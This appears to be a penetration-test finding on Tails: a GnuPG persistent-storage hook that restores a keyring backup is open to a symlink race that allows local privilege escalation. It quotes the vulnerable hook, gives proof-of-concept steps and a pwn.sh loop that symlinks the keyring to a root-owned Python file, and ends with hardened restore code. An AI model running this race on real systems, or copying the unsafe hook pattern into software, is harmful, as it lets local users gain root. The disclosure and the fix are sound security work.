TPS - Local Privilege Escalation (LPE) via symlink race condition in GnuPG activation hook
https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/5
Technical Description
/local/lib/persistent-storage/on-activated-hooks/GnuPG/maybe-restore-gnupg-pubring
#!/bin/sh
# refs: #17807
set -eu
KEYRING="/home/amnesia/.gnupg/pubring.kbx"
KEYRING_BAK="${KEYRING}~"
KEYRING_SIZE="$(stat -c %s ${KEYRING} || echo 0)"
if [ ! -f "${KEYRING}" ] || [ "${KEYRING_SIZE}" -le 32 ]; then
    echo >&2 "warning: It seems the GnuPG keyring is corrupt"
    if [ -f "${KEYRING_BAK}" ]; then
        echo >&2 "warning: Restoring backup of GnuPG keyring"
        cp "${KEYRING_BAK}" "${KEYRING}"
        chmod u=rw,go= "${KEYRING}"
    fi
fi
Impact
POC:
- Overwrite pubring.kbx~ with attacker-controlled content.
- Run pwn.sh.
- Activate / deactivate the GnuPG feature of the Persistent Storage several times until the race-condition window is hit (this could be automated via a socket auth script?).
pwn.sh
#!/bin/bash
while :
do
    rm -rf /home/amnesia/.gnupg/pubring.kbx;
    ln -sf /usr/lib/python3/dist-packages/tailslib/netnsdrop.py /home/amnesia/.gnupg/pubring.kbx;
done
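A hardened version of the hook's restore logic, as an added example (not Tails' own code): it keeps the hook's decisions (missing or <= 32-byte keyring is corrupt, restore from the backup, mode u=rw,go=) but does every open relative to a directory fd with O_NOFOLLOW and checks ownership on the fd it actually writes to, so a symlink planted at pubring.kbx as in pwn.sh makes open(2) fail with ELOOP instead of redirecting the privileged write. Assumed names: gnupg_dir is the user's ~/.gnupg and owner_uid is the uid of amnesia.

```python
import os
import stat

KEYRING = "pubring.kbx"
BACKUP = "pubring.kbx~"
MAX_CORRUPT_SIZE = 32  # the hook treats a keyring of <= 32 bytes as corrupt


def _open_regular(name, flags, dir_fd, allowed_uids):
    """open(2) relative to dir_fd with O_NOFOLLOW, then check on the fd itself
    (nothing can be swapped in afterwards) that it is a regular file of an allowed owner."""
    fd = os.open(name, flags | os.O_NOFOLLOW, 0o600, dir_fd=dir_fd)
    st = os.fstat(fd)
    if not stat.S_ISREG(st.st_mode) or st.st_uid not in allowed_uids:
        os.close(fd)
        raise PermissionError(f"{name}: not a regular file owned by {allowed_uids}")
    return fd


def restore_keyring(gnupg_dir, owner_uid):
    """Hook's decision logic, but a symlink at any step makes open(2) fail with
    ELOOP instead of redirecting the write. Returns 'healthy', 'no-backup' or 'restored'."""
    dfd = os.open(gnupg_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        if os.fstat(dfd).st_uid != owner_uid:
            raise PermissionError("gnupg dir not owned by the expected user")
        size = 0
        try:
            kfd = _open_regular(KEYRING, os.O_RDONLY, dfd, {owner_uid})
            size = os.fstat(kfd).st_size
            os.close(kfd)
        except FileNotFoundError:
            pass
        if size > MAX_CORRUPT_SIZE:
            return "healthy"
        try:
            bfd = _open_regular(BACKUP, os.O_RDONLY, dfd, {owner_uid})
        except FileNotFoundError:
            return "no-backup"
        with os.fdopen(bfd, "rb") as f:
            data = f.read()
        # No O_TRUNC: verify the opened fd first (a new file belongs to our euid,
        # an existing one must belong to the user), only then truncate and write.
        wfd = _open_regular(KEYRING, os.O_WRONLY | os.O_CREAT, dfd,
                            {owner_uid, os.geteuid()})
        with os.fdopen(wfd, "wb") as f:
            os.ftruncate(wfd, 0)
            os.fchmod(wfd, 0o600)  # chmod u=rw,go=
            f.write(data)
        return "restored"
    finally:
        os.close(dfd)
```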